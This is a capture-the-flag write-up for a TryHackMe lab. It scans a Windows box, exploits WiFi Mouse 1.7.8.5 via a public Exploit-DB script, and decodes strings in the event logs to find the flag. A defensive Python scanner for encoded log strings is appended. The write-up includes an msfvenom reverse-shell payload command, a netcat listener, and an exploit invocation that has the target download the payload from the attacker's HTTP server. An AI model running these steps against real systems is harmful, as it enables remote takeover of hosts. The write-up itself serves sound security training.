# Micky Mouse Writeup

Room name: **Micky Mouse**

Room link: [**https://tryhackme.com/jr/yctfweekly**](https://tryhackme.com/jr/yctfweekly)

Description:

**When did Micky Mouse complete its half-century? Micky mouse event was the best event in the world 😁 Can you find the flag of YCTF \`event?**

Hint 1: **Have you tried `nmap -Pn`?**

(A direct hint)

Hint 2: **Micky's 50 Mouse year might help! It's the way to get inside!**

(A quick Google search gives **1978** as the year of Micky Mouse's 50th anniversary.)

![screenshot](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FxHcSIrJNchj7EPEbmRtQ%2Fimage.png?alt=media&token=532cb477-be87-4141-99d2-234f9e03153c)

### Let's begin with the exploitation!

First we ping the machine, but get no response: ICMP is blocked.

![ping output with no response](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FcXgUr3TgPtYtEHBZRqkH%2Fimage.png?alt=media&token=df41a47d-0ade-4772-890b-56b5be05d346)

**So, let's scan the target using rustscan:**

```
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.145.192
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.145.192:1978
Open 10.10.145.192:3389
```

We can see above that ports **1978** and **3389** are open.

A plain nmap scan, however, reports the host as down:

```
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -vv
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning 10.10.145.192 [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for 10.10.145.192 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
```

To get around this, we add `-Pn`, which skips host discovery: nmap then treats the host as up and the port scan begins.

So we run nmap with **`-Pn` (skip host discovery), `-O` (OS detection) and `-sV` (service version detection)**, scanning only ports 1978 and 3389.

```
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -p1978,3389 -sV -O -Pn 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for 10.10.145.192
Host is up (0.16s latency).

PORT     STATE SERVICE        VERSION
1978/tcp open  unisql?
3389/tcp open  ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind
SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n")%r(HTTPOp
SF:tions,13,"system\x20windows\x206\.1\n")%r(RTSPRequest,13,"system\x20win
SF:dows\x206\.1\n")%r(RPCCheck,13,"system\x20windows\x206\.1\n")%r(DNSVers
SF:ionBindReqTCP,13,"system\x20windows\x206\.1\n")%r(DNSStatusRequestTCP,1
SF:3,"system\x20windows\x206\.1\n")%r(Help,13,"system\x20windows\x206\.1\n
SF:")%r(SSLSessionReq,13,"system\x20windows\x206\.1\n")%r(TerminalServerCo
SF:okie,13,"system\x20windows\x206\.1\n")%r(TLSSessionReq,13,"system\x20wi
SF:ndows\x206\.1\n")%r(Kerberos,13,"system\x20windows\x206\.1\n")%r(SMBPro
SF:gNeg,13,"system\x20windows\x206\.1\n")%r(X11Probe,13,"system\x20windows
SF:\x206\.1\n")%r(FourOhFourRequest,13,"system\x20windows\x206\.1\n")%r(LP
SF:DString,13,"system\x20windows\x206\.1\n")%r(LDAPSearchReq,13,"system\x2
SF:0windows\x206\.1\n")%r(LDAPBindReq,13,"system\x20windows\x206\.1\n")%r(
SF:SIPOptions,13,"system\x20windows\x206\.1\n")%r(LANDesk-RC,13,"system\x2
SF:0windows\x206\.1\n")%r(TerminalServer,13,"system\x20windows\x206\.1\n")
SF:%r(NCP,13,"system\x20windows\x206\.1\n")%r(NotesRPC,13,"system\x20windo
SF:ws\x206\.1\n")%r(JavaRMI,13,"system\x20windows\x206\.1\n")%r(WMSRequest
SF:,13,"system\x20windows\x206\.1\n")%r(oracle-tns,13,"system\x20windows\x
SF:206\.1\n")%r(ms-sql-s,13,"system\x20windows\x206\.1\n")%r(afp,13,"syste
SF:m\x20windows\x206\.1\n")%r(giop,13,"system\x20windows\x206\.1\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds
```

Nmap has now identified the OS and shown that the service on port 1978 answers every probe with the unrecognized banner `system windows 6.1`. A simple search for **port 1978 unisql** leads to the exploit **WiFi Mouse 1.7.8.5 - Remote Code Execution**.

![search result for port 1978](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FvYqpy5lqIiJHDGM6M1L5%2Fimage.png?alt=media&token=3b439300-13fb-48d6-9c70-1ffe776a8115)

Download the exploit from <https://www.exploit-db.com/exploits/49601>.

Before running it, generate an **msfvenom payload**, specifying your LHOST and LPORT:

```
┌──(root㉿kali)-[/]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
```

**Now, in one tab, run a Python HTTP server:**

![Python HTTP server](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FHW2QAcrUU7So0Ht6JWo3%2Fimage.png?alt=media&token=6513facd-5365-4f35-a5f9-b60830a3148c)

**In the second tab, start a netcat listener on the LPORT chosen above:**

![netcat listener](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2Frimr5qZOMl1Lo20irJXR%2Fimage.png?alt=media&token=e6a58bac-64b4-4fde-85cf-8d561696e1c2)

**In the third tab, run the exploit:**

```
python3 mouse.py <Target IP> <tun0 IP> <Payload.exe>
```

![running the exploit](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2Fb4wXN3d8t1h4wfoCEtGd%2Fimage.png?alt=media&token=f4a0baa2-b94f-4a5b-a892-806b2902106e)

Hola!! You got the **shell!**

![reverse shell received](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FYMbxfZiObvjffnfK3SYf%2Fimage.png?alt=media&token=f119b63b-9dd0-46cd-b7a0-25dfca091552)

Now read the description and the question again. What do they say?

It says, **Can you find the flag of YCTF \`event?**

That is the biggest hint: the word **event** is repeated in both the description and the question.

![room description and question](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FlOgKgYH9Po6MoyLPcOuC%2Fimage.png?alt=media&token=f0ca5e38-68e7-493c-93a3-d7dd65b78069)

Now it makes sense to look at the **Windows event logs**.

Using the command `wevtutil qe Application`, we can dump all events from the Windows Application log.

![wevtutil output](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FTiojqvx3zTwCjUSmNbSD%2Fimage.png?alt=media&token=0fa17daf-0550-4a13-9c43-91715c92af52)

Scrolling down a little, we find a **fake flag**.

![fake flag in the event log](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2F5aNVrC1lGTUHlUb3jWJa%2Fimage.png?alt=media&token=c41b7c3f-4d0c-46aa-b8ed-0a2e92de5413)

So I copied the whole log output to my machine and searched for Base64 strings manually. Searching for the string `==` turned up one string:

`ZGlkIHlvdSBjaGVjayBldmVudCBpZCA2OSBodWg/Cg==`

![Base64 string found in the log](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2Fb8iKm8Qcl2JkcVDDULpS%2Fimage.png?alt=media&token=175fc9a8-4aa8-40db-96db-cb5114728806)

Decoding the Base64 string in CyberChef gives another hint:

**did you check event id 69 huh?**

![CyberChef Base64 decode](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FHj84OIRrWpmH9ZTXMk91%2Fimage.png?alt=media&token=c70469c2-af06-40d8-90ac-ee2c851b6f2b)

So I looked for the event with **ID 69**.

![event ID 69](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FH011Pb4sHQerGMluAjPx%2Fimage.png?alt=media&token=863b83d2-10f2-4f33-b6a8-66e35909bb6b)

Looking closely at event 69, we see a strange-looking string:

`594354467b5230306d5f667531315f30665f6d307535337d0a`

Pasting it into [CyberChef](https://gchq.github.io/CyberChef/) and applying a hex decode gives the actual flag!

**Flag:** `YCTF{R00m_fu11_0f_m0u53}`

![CyberChef hex decode revealing the flag](https://829309341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYfiZJNM9tM6hwcuBSR4G%2Fuploads%2FYB9GRNrlpxWG4T9z0fh8%2Fimage.png?alt=media&token=65f444d5-d3f9-453b-b2ee-48f99cfad04a)
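The manual hunt above (dump the Application log, grep for `==`, decode, then hex-decode the string in event 69) is the kind of thing an analyst automates when looking for encoded strings hidden in event logs. The following Python scanner is an added example, not part of the original writeup: it walks text output of the shape produced by `wevtutil qe Application /f:text`, tracks the `Event ID:` of each record, and reports every Base64 or hex run that decodes to readable text. The log records in `SAMPLE_LOG` are constructed; only the two encoded strings are taken from the room.

```python
import base64
import re
# Constructed sample shaped like `wevtutil qe Application /f:text` output (most
# fields trimmed); the two encoded strings are the ones found in the room.
SAMPLE_LOG = """\
  Event ID: 1000
Service started normally.
  Event ID: 42
ZGlkIHlvdSBjaGVjayBldmVudCBpZCA2OSBodWg/Cg==
  Event ID: 69
594354467b5230306d5f667531315f30665f6d307535337d0a
"""

EVENT_ID_RE = re.compile(r"^\s*Event ID:\s*(\d+)")
# 8+ hex byte pairs, or 16+ Base64 characters with optional '=' padding.
HEX_RE = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){8,}(?![0-9A-Fa-f])")
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")

def _as_text(data: bytes):
    """Decoded text if it is printable ASCII, else None (drops random runs)."""
    text = data.decode("ascii", errors="replace")
    ok = "\ufffd" not in text and all(c.isprintable() or c in "\r\n\t" for c in text)
    return text.rstrip("\r\n") if ok else None

def decode_candidates(line: str):
    """Yield (encoding, text) for each hex or Base64 token found on one line."""
    for m in HEX_RE.finditer(line):
        if (text := _as_text(bytes.fromhex(m.group()))) is not None:
            yield "hex", text
    for m in B64_RE.finditer(line):
        if HEX_RE.fullmatch(m.group()):
            continue  # pure hex runs were already handled above
        try:
            text = _as_text(base64.b64decode(m.group(), validate=True))
        except ValueError:  # bad length, padding or characters
            continue
        if text is not None:
            yield "base64", text

def find_encoded_strings(log_text: str):
    """Walk the log, tracking the current Event ID; return (id, enc, text) hits."""
    hits, event_id = [], None
    for line in log_text.splitlines():
        m = EVENT_ID_RE.match(line)
        if m:
            event_id = int(m.group(1))
        else:
            hits.extend((event_id, enc, text) for enc, text in decode_candidates(line))
    return hits
```

On a real dump, feed the file contents to `find_encoded_strings` and review the hits per event ID; the printable-text filter keeps random alphanumeric runs (GUIDs, hashes) from being reported as decoded messages.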

Challenge Credits: [Munazir](https://linkedin.com/in/Munazirul)

Hope you enjoyed the machine and learned new things from the challenge! 🌟📚
